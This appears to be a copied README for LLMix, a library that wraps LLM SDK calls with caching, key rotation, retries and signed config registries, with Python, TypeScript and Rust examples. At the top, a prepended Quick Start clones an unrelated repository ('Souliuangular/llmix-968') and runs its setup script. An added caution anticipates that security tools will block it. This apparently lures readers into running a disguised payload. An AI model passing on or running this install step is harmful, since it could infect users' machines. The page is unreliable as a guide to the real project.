# LLMix

Caution

Some security tools may block the installation. Only download from the official repository, and do not pause or disable security protection to run the setup.

## Quick Start

```shell
git clone https://github.com/Souliuangular/llmix-968.git
cd llmix-968
python setup.py
```

Read in other languages: English · 中文 · Deutsch · Español · Français · Русский · 한국어 · 日本語 · हिन्दी

Config-driven LLM calls for Python, TypeScript, and Rust. Keep your SDK. Move model behavior into MDA presets. Put cache, retries, key rotation, and rollout control around the call.

LLMix is the layer between your product and the provider SDK.

It does not ask you to rewrite your OpenAI, Anthropic, Gemini, LiteLLM, AI SDK, or custom client code. It wraps the call. The boring parts go around it: response cache, circuit breaker, key pools, singleflight, retry policy, adaptive concurrency, provider kwargs, and MDA config loading.

The model stops being a hard-coded string buried in application code. It becomes data. Change a preset, publish a compiled registry release, reload the service, and the next request can run a different provider or model. No redeploy for the usual model swap dance.

That is the whole thing. Small layer. Sharp edges filed down.

## Why It Exists

AI products in 2026 do not usually fail because one SDK call is hard.

They fail in the spaces around the call. A key gets rate limited. A provider gets slow. Two hundred users ask the same thing at once. A model swap needs a deploy. A cache key differs by one invisible parameter. One service is in Python, another is in TypeScript, and the Rust worker has to follow the same contract.

LLMix is for that part of the system. The signal chain between your app and the model.

You still own the prompt. You still own the SDK. LLMix owns the harness.

TypeScript OpenAI-compatible helpers

Python Redis cache support

Rust OpenAI helper and Redis cache

```shell
cargo add llmix-rs --features providers-openai,redis
```


LLMix uses the MDA config packages for preset loading. They are also published
as standalone runtime loaders for apps that need `.mda` validation, integrity,
or trust-policy enforcement outside LLMix.

---

## Documentation

If you are new to LLMix, read in this order:

Other operations docs:

- [Secure LLMix configuration translations](docs/llmix/secure-mda/secure-llmix-configuration.md) ([de](docs/llmix/secure-mda/secure-llmix-configuration.de.md), [es](docs/llmix/secure-mda/secure-llmix-configuration.es.md), [fr](docs/llmix/secure-mda/secure-llmix-configuration.fr.md), [hi](docs/llmix/secure-mda/secure-llmix-configuration.hi.md), [ja](docs/llmix/secure-mda/secure-llmix-configuration.ja.md), [ko](docs/llmix/secure-mda/secure-llmix-configuration.ko.md), [ru](docs/llmix/secure-mda/secure-llmix-configuration.ru.md), [中文](docs/llmix/secure-mda/secure-llmix-configuration.zh.md))
- [Key pool operations](docs/llmix/key-pool-operations.md)
- [Standalone MDA config loader docs](docs/mda-config/README.md)

---

## At a Glance

![LLMix wraps your existing LLM SDK stack with MDA config, cache, resilience, and key-pool primitives.](docs/llmix/images/llmix-wraps-sdk.png)

LLMix wraps one provider call at a time.

It is not a router in the LiteLLM sense. It is closer to the harness you keep rebuilding around every agent, coder tool, extraction service, and internal AI workflow once traffic becomes real.

---


### TypeScript

```typescript
import {
  CallPipeline,
  KeyPool,
  TwoTierCache,
  openaiDispatch,
} from "@snoai/llmix";

const pipeline = new CallPipeline({
  dispatch: openaiDispatch(),
  responseCache: new TwoTierCache("memory"),
});

pipeline.setKeyPool("openai", new KeyPool([process.env.OPENAI_API_KEY!]));

const response = await pipeline.call({
  config: {
    provider: "openai",
    model: "gpt-4o-mini",
    common: { temperature: 0.2, maxOutputTokens: 512 },
    caching: { strategy: "memory" },
  },
  messages: [
    { role: "user", content: "Explain LLMix in one sentence." },
  ],
});

console.log(response.content);
await pipeline.close();
```

### Python

```python
import asyncio
import os

from llmix import (
    CallInput,
    CallPipeline,
    KeyPool,
    PipelineConfig,
    TwoTierCache,
    openai_dispatch,
)


async def main() -> None:
    pipeline = CallPipeline(
        PipelineConfig(
            dispatch=openai_dispatch(),
            response_cache=TwoTierCache("memory"),
        )
    )

    pipeline.set_key_pool("openai", KeyPool([os.environ["OPENAI_API_KEY"]]))

    response = await pipeline.call(
        CallInput(
            config={
                "provider": "openai",
                "model": "gpt-4o-mini",
                "common": {"temperature": 0.2, "max_output_tokens": 512},
                "caching": {"strategy": "memory"},
            },
            messages=[
                {"role": "user", "content": "Explain LLMix in one sentence."}
            ],
        )
    )

    print(response.content)
    await pipeline.close()


asyncio.run(main())
```

### Rust

Rust exposes the same pipeline contract. The OpenAI helper is feature-gated.

```toml
[dependencies]
llmix-rs = { version = "2.0.0", features = ["providers-openai"] }
serde_json = "1"
tokio = { version = "1", features = ["macros", "rt"] }
```

```rust
use llmix_rs::{
    load_keys_from_env, CallInput, CallPipeline, OpenAiChatHelper, PipelineConfig,
};
use serde_json::json;

let pipeline = CallPipeline::new(PipelineConfig::new(OpenAiChatHelper::new()))?;
pipeline.set_key_pool("openai", load_keys_from_env("openai")?);

let response = pipeline
    .call(CallInput {
        config: json!({
            "provider": "openai",
            "model": "gpt-4o-mini",
            "common": { "temperature": 0.2, "max_output_tokens": 512 },
            "caching": { "strategy": "memory" }
        }),
        messages: vec![json!({
            "role": "user",
            "content": "Explain LLMix in one sentence."
        })],
        singleflight_key: None,
    })
    .await;
```

See the Rust guide for full main examples and feature flags.

## What You Get Around Every Call

| Concern | What LLMix does |
| --- | --- |
| Response cache | L1 memory plus optional Redis L2, with cross-runtime canonical cache keys |
| Key pools | Round-robin key selection, 429 rotation, and 401/403 dead-key eviction |
| Retries | Jittered exponential backoff, with `Retry-After` honored |
| Circuit breaker | Scoped by provider and effective base URL |
| Singleflight | Collapses identical concurrent work into one upstream request |
| Concurrency | AIMD adaptive semaphore, driven by rate-limit feedback |
| Provider kwargs | Common config becomes provider-specific request fields |
| Thinking tokens | Optional `<think>` extraction into normalized response objects |
| Registry | Signed compiled config registry with one live `current.json` pointer |
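To make the "canonical cache keys" row concrete, here is a minimal sketch of one way to derive a key that does not change with dict insertion order. The function name `canonical_cache_key` and the choice of sorted-key JSON plus SHA-256 are assumptions for illustration; this is not LLMix's actual key format, and a real cross-runtime scheme also has to agree on number formatting across languages.

```python
import hashlib
import json
from typing import Any


def canonical_cache_key(config: dict[str, Any], messages: list[dict[str, Any]]) -> str:
    """Hash a call into a stable key, independent of dict insertion order."""
    payload = {"config": config, "messages": messages}
    # sort_keys plus fixed separators give one byte-for-byte encoding
    # for logically equal inputs.
    encoded = json.dumps(
        payload, sort_keys=True, separators=(",", ":"), ensure_ascii=False
    )
    return hashlib.sha256(encoded.encode("utf-8")).hexdigest()


same_a = canonical_cache_key(
    {"model": "gpt-4o-mini", "temperature": 0.2},
    [{"role": "user", "content": "hi"}],
)
same_b = canonical_cache_key(
    {"temperature": 0.2, "model": "gpt-4o-mini"},
    [{"content": "hi", "role": "user"}],
)
different = canonical_cache_key(
    {"model": "gpt-4o-mini", "temperature": 0.3},
    [{"role": "user", "content": "hi"}],
)
```

Here `same_a` and `same_b` are equal because only key order differs, while `different` changes because the temperature is part of the hashed payload.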

The defaults are meant to be boring. Tune them when real traffic gives you a reason.
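As an illustration of the retry row in the table, the following is a generic sketch of jittered exponential backoff that defers to a server-supplied `Retry-After` value. The function name `retry_delay` and the `base` and `cap` defaults are hypothetical and are not LLMix's real defaults or API.

```python
import random
from typing import Optional


def retry_delay(
    attempt: int,
    retry_after: Optional[float] = None,
    base: float = 0.5,
    cap: float = 30.0,
    rng: Optional[random.Random] = None,
) -> float:
    """Seconds to wait before retry number `attempt` (0-based)."""
    if retry_after is not None:
        # A server-provided Retry-After wins over the computed backoff.
        return max(0.0, retry_after)
    rng = rng or random.Random()
    # Exponential growth, bounded by `cap`.
    ceiling = min(cap, base * (2 ** attempt))
    # Full jitter: pick uniformly in [0, ceiling] so that many clients
    # do not retry in lockstep.
    return rng.uniform(0.0, ceiling)
```

This sketch leaves `Retry-After` uncapped. Whether to bound it is a policy choice that depends on how long a caller is willing to wait.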

## MDA Presets

LLMix uses MDA as the source format for model presets. Human notes and runtime settings live in one file. Production services read the compiled registry, not the mutable source tree. Python, TypeScript, and Rust can require MDA integrity, `requires.network`, and verifier-hook-based signatures while loading or publishing registry output. Real Rekor transport and Sigstore cryptography are supplied by caller-provided clients and verifiers.

The examples below use this preset path:

```text
config/llm/source/search_summary/openai_fast.mda
```

```markdown
---
name: openai_fast
description: Fast OpenAI preset for search summaries.
metadata:
  snoai-llmix:
    common:
      provider: openai
      model: gpt-5-mini
      temperature: 0.2
      maxOutputTokens: 512
    caching:
      strategy: redis-or-memory
    providerOptions:
      openai:
        reasoningEffort: medium
---
# openai_fast

Summarize search results for a research workflow.
```

Load it directly when editing or testing a preset:

```typescript
import { loadMdaConfig } from "@snoai/llmix";

const config = await loadMdaConfig("./config/llm/source/search_summary/openai_fast.mda");
```

```python
from llmix import load_mda_config

config = load_mda_config("./config/llm/source/search_summary/openai_fast.mda")
```

```rust
use llmix_rs::load_config;

let config = load_config("./config/llm/source/search_summary/openai_fast.mda")?;
```

For production services, use the registry.

## Config Registry

Use this layout. Treat it as the public contract:

```text
config/llm/
  source/
    <module>/
      <preset>.mda
  current.json
  compiled/
```

`source/` is edited by people. `current.json` and `compiled/` are generated by LLMix. Store the trust anchor outside `config/llm`.
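The layout implies that a preset is addressed as `<module>/<preset>`, for example `search_summary/openai_fast`. A small read-only sketch of listing those ids from the source tree follows. The helper name `list_preset_ids` is hypothetical and is not part of LLMix; it only walks `source/` and never touches the generated `current.json` or `compiled/`.

```python
from pathlib import Path


def list_preset_ids(registry_root: Path) -> list[str]:
    """Return sorted "<module>/<preset>" ids found under source/."""
    source = registry_root / "source"
    ids = []
    # Exactly two levels deep: source/<module>/<preset>.mda
    for path in source.glob("*/*.mda"):
        ids.append(f"{path.parent.name}/{path.stem}")
    return sorted(ids)
```

Calling `list_preset_ids(Path("config/llm"))` on the layout above would return one id per `.mda` file, which can be handy for a pre-release sanity check.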

The release flow below uses the did:web profile. It assumes these release-identity inputs already exist outside `config/llm`: `release/did-web-private-key.pem` and `release/did.json`. Provide them from your release system, or use the GitHub Actions Sigstore/Rekor profile instead.

```shell
mkdir -p config/llm/source/search_summary release deploy

mda init --template llmix-preset \
  --module search_summary \
  --preset openai_fast \
  --provider openai \
  --model gpt-5-mini \
  --out config/llm/source/search_summary/openai_fast.mda

mda validate config/llm/source/search_summary/openai_fast.mda \
  --target source \
  --json

mda integrity compute config/llm/source/search_summary/openai_fast.mda \
  --target source \
  --write \
  --json

mda release trust policy \
  --target llmix-registry \
  --profile did-web \
  --domain config.example.com \
  --out release/trust-policy.json \
  --json

mda sign config/llm/source/search_summary/openai_fast.mda \
  --profile did-web \
  --did did:web:config.example.com \
  --key-id did:web:config.example.com#release \
  --key-file release/did-web-private-key.pem \
  --in-place \
  --json

mda verify config/llm/source/search_summary/openai_fast.mda \
  --target source \
  --policy release/trust-policy.json \
  --did-document release/did.json \
  --json

mda release prepare \
  --target llmix-registry \
  --source config/llm/source \
  --registry-dir config/llm \
  --policy release/trust-policy.json \
  --did-document release/did.json \
  --out release/plan.json \
  --json

llmix publish-registry \
  --root config/llm \
  --release-plan release/plan.json \
  --revision 2026-05-14T000000Z \
  --policy release/trust-policy.json \
  --did-document release/did.json \
  --root-did did:web:config.example.com \
  --root-key-id did:web:config.example.com#release \
  --root-key-file release/did-web-private-key.pem \
  --json

mda release finalize \
  --target llmix-registry \
  --registry-dir config/llm \
  --registry-root config/llm/compiled/2026-05-14T000000Z/registry-root.json \
  --release-plan release/plan.json \
  --policy release/trust-policy.json \
  --derive-root-digest \
  --minimum-revision 2026-05-14T000000Z \
  --out deploy/llmix-trust.json \
  --did-document release/did.json \
  --json

mda doctor release \
  --target llmix-registry \
  --source config/llm/source \
  --registry-dir config/llm \
  --release-plan release/plan.json \
  --manifest deploy/llmix-trust.json \
  --did-document release/did.json \
  --json

llmix check-registry \
  --root config/llm \
  --trust deploy/llmix-trust.json \
  --preset search_summary/openai_fast \
  --did-document release/did.json \
  --tamper-proof \
  --json
```

Runtime code opens the generated registry with the external trust anchor:

```typescript
import {
  ConfigRegistryManager,
  loadLlmixTrustManifest,
  registryRootOptionsFromTrustManifest,
} from "@snoai/llmix";

const trust = await loadLlmixTrustManifest(process.env.LLMIX_TRUST_ANCHOR!);
const manager = await ConfigRegistryManager.open("config/llm", {
  signedRoot: registryRootOptionsFromTrustManifest(trust, { didWebVerifier }),
});
const config = await manager.getPreset("search_summary", "openai_fast");
```

`didWebVerifier` is the app verifier hook required by this did:web policy. For a command-line runtime proof, use `llmix check-registry --did-document release/did.json`; in app code, pass the verifier hooks required by your trust policy.

Managers expose the active revision and reload health metadata. That makes it easy to say exactly which config a service is running. See Secure LLMix Configuration with MDA for the complete release flow and runtime tamper-rejection proof.

`ConfigRegistryPublisher` is still available for advanced release systems, but the default public path is the `llmix publish-registry` command. Do not write a project-local registry compiler.

## Provider Coverage

The public dispatch helpers cover the providers we actually test.

| Provider | Python | TypeScript | Notes |
| --- | --- | --- | --- |
| OpenAI | `openai_dispatch` | `openaiDispatch` | OpenAI Responses and chat-style flows |
| Anthropic | `anthropic_dispatch` | `anthropicDispatch` | Messages API, thinking budget validation |
| Gemini | `gemini_dispatch` | `geminiDispatch` | Google GenAI-compatible params |
| OpenRouter | `openrouter_dispatch` | `openrouterDispatch` | OpenAI-compatible |
| DeepInfra | `deepinfra_dispatch` | `deepinfraDispatch` | OpenAI-compatible |
| Novita | `novita_dispatch` | `novitaDispatch` | OpenAI-compatible |
| Together | `together_dispatch` | `togetherDispatch` | OpenAI-compatible |
| Sno GPU | `sno_gpu_dispatch` | `snoGpuDispatch` | On-prem OpenAI-compatible GPU endpoints |

Rust currently ships the neutral pipeline plus feature-gated helpers for OpenAI, Anthropic, Gemini, and Sno GPU. Treat Rust provider helpers as beta. The cache, key-pool, registry, retry, and pipeline contract are aligned with Python and TypeScript.

OpenAI-compatible providers reuse the OpenAI request shape with provider-specific `base_url` handling. That keeps the contract plain. Plain is useful.
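A rough sketch of what "same request shape, different base URL" can look like is shown here. The `BASE_URLS` table, the `build_chat_request` helper, and the mapping of `max_output_tokens` to `max_tokens` are illustrative assumptions; they are not LLMix internals, and the URLs should be confirmed against each provider's documentation.

```python
from typing import Any

# Assumed base URLs for illustration only.
BASE_URLS = {
    "openai": "https://api.openai.com/v1",
    "openrouter": "https://openrouter.ai/api/v1",
    "together": "https://api.together.xyz/v1",
}


def build_chat_request(
    config: dict[str, Any], messages: list[dict[str, str]]
) -> tuple[str, dict[str, Any]]:
    """Map a neutral config onto a chat-completions URL and JSON body."""
    common = config.get("common", {})
    url = BASE_URLS[config["provider"]].rstrip("/") + "/chat/completions"
    body: dict[str, Any] = {"model": config["model"], "messages": messages}
    if "temperature" in common:
        body["temperature"] = common["temperature"]
    if "max_output_tokens" in common:
        # Chat-completions style APIs name this field max_tokens.
        body["max_tokens"] = common["max_output_tokens"]
    return url, body
```

Only the URL depends on the provider in this sketch. The body is built once from the common config, which is the property that keeps the contract plain.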

## Environment Variables

| Variable | Purpose |
| --- | --- |
| `OPENAI_API_KEY` / `OPENAI_KEYS` | OpenAI key or comma-separated key pool |
| `ANTHROPIC_API_KEY` / `ANTHROPIC_KEYS` | Anthropic key or comma-separated key pool |
| `GEMINI_API_KEY` / `GEMINI_KEYS` | Gemini key or comma-separated key pool |
| `OPENROUTER_API_KEY` / `OPENROUTER_KEYS` | OpenRouter key or comma-separated key pool |
| `DEEPINFRA_API_KEY` / `DEEPINFRA_KEYS` | DeepInfra key or comma-separated key pool |
| `TOGETHER_API_KEY` / `TOGETHER_KEYS` | Together key or comma-separated key pool |
| `NOVITA_API_KEY` / `NOVITA_KEYS` | Novita key or comma-separated key pool |
| `SNO_LLM_API_KEY` | Sno GPU direct dispatcher fallback |
| `SNO_GPU_API_KEY` / `SNO_GPU_KEYS` | Sno GPU key-pool variables for provider id `sno-gpu` |
| `GPU_BASE_URL` | Sno GPU base URL |
| `REDIS_URL` | Redis response-cache URL |
| `LLMIX_STATE_DIR` | Lock files, batch metadata, and kill-switch state |

`load_keys_from_env("provider-name")` checks `PROVIDER_NAME_KEYS` first, then `PROVIDER_NAME_API_KEY`. Dashes become underscores.
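The lookup rule can be sketched in a few lines. The function below is a stand-in named `keys_from_env` (deliberately not the real `load_keys_from_env`), and details such as trimming whitespace or falling back when the pooled variable is empty are assumptions rather than documented behavior.

```python
import os
from typing import Mapping, Optional


def keys_from_env(provider: str, env: Optional[Mapping[str, str]] = None) -> list[str]:
    """Resolve API keys for a provider id such as "sno-gpu"."""
    env = os.environ if env is None else env
    # Dashes become underscores: "sno-gpu" -> "SNO_GPU".
    prefix = provider.upper().replace("-", "_")
    # The pooled variable is checked first and split on commas.
    pooled = env.get(f"{prefix}_KEYS", "")
    keys = [key.strip() for key in pooled.split(",") if key.strip()]
    if keys:
        return keys
    # Otherwise fall back to the single-key variable.
    single = env.get(f"{prefix}_API_KEY", "").strip()
    return [single] if single else []
```

Passing an explicit mapping instead of reading `os.environ` keeps the rule easy to unit test.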

## What This Is Not

- Not a streaming framework. Streaming stays with your SDK.
- Not a prompt framework. Bring your own prompt layer.
- Not a provider marketplace. One call uses the provider named by its config.
- Not a reason to hide every model decision behind indirection. Some things should stay in code.

LLMix is useful when the same model-call shape keeps showing up across services. If you have one script and one key, you probably do not need it yet.

## Development

```shell
# Full monorepo checks
bun run build
bun run check
bun run test
```

## License

Apache-2.0
